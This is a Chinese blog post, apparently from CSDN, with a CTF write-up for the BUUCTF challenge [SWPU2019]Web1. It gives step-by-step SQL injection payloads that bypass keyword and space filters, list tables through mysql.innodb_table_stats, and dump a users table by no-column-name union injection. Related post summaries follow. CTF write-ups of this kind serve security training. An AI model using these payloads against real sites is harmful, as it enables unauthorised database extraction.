[SWPU2019]Web1

已于 2022-04-16 00:16:34 修改
阅读量631 收藏 2
点赞数
文章标签: web安全
于 2022-04-15 23:17:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124205120
版权

[SWPU2019]Web1

首先打开题目发现是一个登陆界面,尝试sql注入没有效果

发现可以注册就随便注册一个用户登陆

发现有一个广告申请发布

在这里插入图片描述

对这个广告申请发布进行各种注入攻击,发现有sql注入

在这里插入图片描述

点击广告详情发现sql语句报错:

在这里插入图片描述

就住它进行注入发现有过滤:

在这里插入图片描述

然后测试发现:过滤了空格,or,and,注释,updatexml,extractvalue

所以我们采用union注入,空格用/**/代替,注释采取单引号闭合

因为过滤了or

所有我们采用:

1'/**/group/**/by/**/1,'1

检测有几个字段最终在23处发现报错:

在这里插入图片描述

然后找出回显点:

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

发现在2,3处

在这里插入图片描述

查看当前数据库:

-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

得到:

在这里插入图片描述

获取表面

因为过滤了or所有information就不能用

我们采取mysql.innodb_table_stats来获取表名

获取表名:

-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

发现有两张表,先看users表,但是没有字段名

这里采取无字段名注入

原理参考这篇博客:
https://www.jianshu.com/p/dc9af4ca2d06

先获取users有几个字段用:

-1'/**/union/**/select/**/1,(select/**/group_concat(1)/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

得到:
在这里插入图片描述

得到字段值为3

获取表字段值

第一个字段值:

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1/**/as/**/b,2,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

得到:

在这里插入图片描述

获取第二个字段:

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

得到:
在这里插入图片描述
发现flag

在查看第三个字段:

-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)hack),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

得到flag:

在这里插入图片描述
参考博客:

https://blog.csdn.net/weixin_45642610/article/details/114748031
南冥~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
swpu前端实验4的实验
04-23
swpu
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
[SWPU2019]Web1(sql)
最新发布
wikey 的博客
03-30 906
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select/爆表名,这里不能使用or,所以这里使用的是新的payload。
swpu考试系统
07-01
swpu考试系统,内部的系统
SWPU大数据概论课程报告
01-31
仅作备份
[SWPU2019]Web1(无列名注入)
paidx0
08-30 380
每天一题,记录学习 题目有几个地方把我坑惨了,哈哈哈 首先试了一下注册一个admin账号,然后就发现admin已经被注册 然后就开始试了一堆admin的密码进行爆破,人傻了,考点压根就不在这。 直接注册一个号进去看看 发布广告的位置又让我想起了 XSS,然后就又上当了 其实这是一道SQL注入的题目,太坑了吧 通过简单的测试,过滤了空格,or,and,--+,#等等 因为这里过滤了 or,所以information_schema库自然是也用不成了,所以就用到了无列名的注入方式 具体用法可以看看我的另
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1533
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看题目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标题有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
[SWPU2019]Web1 sql注入过滤了information 无列名查询
m0_64180167的博客
09-19 370
记录一道过滤 or 导致无法使用 information_schema.tables的题目。
[SWPU2019]Web1 (bypass information_schema,无列名注入)
qq_52907838的博客
09-26 301
打开环境,是个登录框: 注册账号,登录后,有个广告发布,随便输入后查看详情后会回显: 一下子就会想到是xss,于是我试了一下,果然还真存在xss: 但是后来才知道没用,是个SQL题,注入点在标题那: 按照步骤来,发现or,#都被过滤,空格会被消除,空格简单,用/**/就能绕过,但order by和information_schema都不能用,那咋判断字段数,不会要用union select一个个试吧(那这个题可能要搞傻),其实还可以用group by: 1'/**/group..
BUUCTF [SWPU2019]Web1
qq_56313338的博客
08-27 250
这里将表命名为 x,并且第2个字段命名为a,第三个字段命名b。这是一道sql二次注入题目,但是注入点并不在登录处。获取当前数据库users表的第二列的所有数据。有很多列(我也不知道为啥这么多列…按照猜测,第三列因该就是密码了。admin的密码就是flag。广告申请处进行sql注入。你会发现过滤了很多关键字。就是查询第二列的所有数据。这里用到了一些绕过技巧。注册一个用户然后登录。
buuctf [SWPU2019]Web1 记录
SopRomeo的博客
03-14 1330
注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞 可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。 百度了web 发现广告栏存在sql注入… 学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。 我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧… 在title进行常规sql判...
buuctf [SWPU2019]Web1 1
weixin_45642610的博客
03-13 1565
buuctf [SWPU2019]Web1 1 sql 无列名注入 注册登录发布广告 1'测试 存在sql注入 经测试,or,空格,#被过滤 不能用order by测试列数,用group by代替 注释符#用,'3代替,数字随便 (这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?) 空格用/**/代替 1'/**/group/**/by/**/22,'3 1'/**/group/**/by/**/23,'
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值